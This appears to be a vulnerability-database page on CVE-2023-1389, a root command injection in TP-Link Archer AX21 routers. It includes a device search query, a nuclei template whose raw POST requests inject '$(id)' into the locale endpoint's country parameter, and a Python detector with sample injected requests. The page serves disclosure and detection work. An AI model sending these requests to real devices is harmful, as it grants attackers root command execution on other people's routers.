TP-Link Archer AX21 (AX1800) Unauthenticated Command Injection Vulnerability

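Vulnerability information

Vulnerability name: TP-Link Archer AX21 (AX1800) Unauthenticated Command Injection Vulnerability

Vulnerability ID:

  • CVE: CVE-2023-1389

Vulnerability type: Command execution

Severity: Critical

Description: The TP-Link Archer AX21 (AX1800) router has an unauthenticated OS command injection vulnerability: an attacker can execute arbitrary commands through the country parameter of the locale endpoint. The vulnerability lets a remote attacker execute arbitrary commands with root privileges. The affected devices are TP-Link Archer AX21 (AX1800) routers, which are widely used in home and small-business networks. The technical root cause is improper validation of user input: when handling the country parameter of the locale endpoint, the device does not adequately filter malicious input, which leads to command injection. Exploitation can lead to serious security risks, including but not limited to remote code execution, data leakage and service disruption. Because the attack requires no authentication and can be automated, the vulnerability is rated critical. Users are advised to update immediately to the latest firmware version provided by TP-Link to fix the vulnerability.

Vendor: tp-link

Product: Archer AX21 (AX1800)

Search syntax: body="tp-link"

Source: https://github.com/projectdiscovery/nuclei-templates/blob/a59f6de5eb608fcb94893c7b040f5ef765d0a6fd/http%2Fcves%2F2023%2FCVE-2023-1389.yaml

Type: projectdiscovery/nuclei-templates:github issues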

PoC details


```yaml
id: CVE-2023-1389

info:
  name: TP-Link Archer AX21 (AX1800) - Unauthenticated Command Injection
  author: ritikchaddha
  severity: critical
  description: |
    TP-Link Archer AX21 (AX1800) routers are vulnerable to unauthenticated OS command injection via the country parameter in the locale endpoint. This allows remote attackers to execute arbitrary commands as root.
  remediation: |
    Update to the latest firmware version provided by TP-Link.
  reference:
    - https://www.tenable.com/security/research/tra-2023-11
    - https://nvd.nist.gov/vuln/detail/CVE-2023-1389
    - https://github.com/tenable/poc-cve-2023-1389
  classification:
    cve-id: CVE-2023-1389
    cwe-id: CWE-78
    epss-score: 0.94022
    epss-percentile: 0.99883
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
  metadata:
    max-request: 1
    vendor: tp-link
    product: archer-ax21
    fofa-query: body="tp-link"
  tags: cve,cve2023,tp-link,archer,ax21,rce,router,kev

http:
  - raw:
      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)

      - |
        POST /cgi-bin/luci/;stok=/locale?form=country HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        operation=write&country=$(id)

    matchers-condition: and
    matchers:
      - type: regex
        part: body
        regex:
          - "uid=([0-9(a-z)]+) gid=([0-9(a-z)]+)"

      - type: status
        status:
          - 200
```
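
A defensive check for the request shown in the template, as an added example that is not part of the original page or of the nuclei template: it flags POSTs to the locale endpoint whose `country` value is not a plain two-letter code, including percent-encoded forms. The allowlist pattern, the function names and the sample records are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Path of the locale endpoint as it appears in the template; the stok token may be empty.
LOCALE_PATH = re.compile(r"/cgi-bin/luci/;stok=[^/]*/locale")
# Assumption: a legitimate country value is a two-letter code; anything else is rejected.
COUNTRY_ALLOWED = re.compile(r"[A-Za-z]{2}")

def classify(method, target, body):
    """Return 'ignore', 'valid' or 'reject' for one HTTP request."""
    url = urlsplit(target)
    if method.upper() != "POST" or not LOCALE_PATH.fullmatch(url.path):
        return "ignore"
    if parse_qs(url.query).get("form") != ["country"]:
        return "ignore"
    # parse_qs percent-decodes, so encoded metacharacters are checked in decoded form.
    countries = parse_qs(body, keep_blank_values=True).get("country")
    if countries is None:
        return "ignore"
    if all(COUNTRY_ALLOWED.fullmatch(c) for c in countries):
        return "valid"
    return "reject"

def flag_requests(records):
    """Return the source addresses of requests whose country value fails the allowlist."""
    return [src for src, method, target, body in records
            if classify(method, target, body) == "reject"]

# Constructed sample records: (source, method, request target, body).
# Addresses are from documentation ranges; none of this is captured traffic.
SAMPLE = [
    ("192.0.2.10", "POST", "/cgi-bin/luci/;stok=/locale?form=country", "operation=write&country=$(id)"),
    ("192.0.2.11", "POST", "/cgi-bin/luci/;stok=abc123/locale?form=country", "operation=write&country=US"),
    ("198.51.100.7", "POST", "/cgi-bin/luci/;stok=/locale?form=country", "operation=write&country=%24%28id%29"),
    ("192.0.2.12", "POST", "/cgi-bin/luci/;stok=/locale?form=lang", "operation=write&locale=en_US"),
    ("192.0.2.13", "GET", "/cgi-bin/luci/;stok=/locale?form=country", ""),
]

if __name__ == "__main__":
    for src in flag_requests(SAMPLE):
        print("reject:", src)
```

The same allowlist, applied before the value is used, is the input validation whose absence the description names as the root cause; on a network sensor it only works where the request body is visible.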



http://example.com/2025/07/14/github_2467631764/
Author: lianccc
Published: July 14, 2025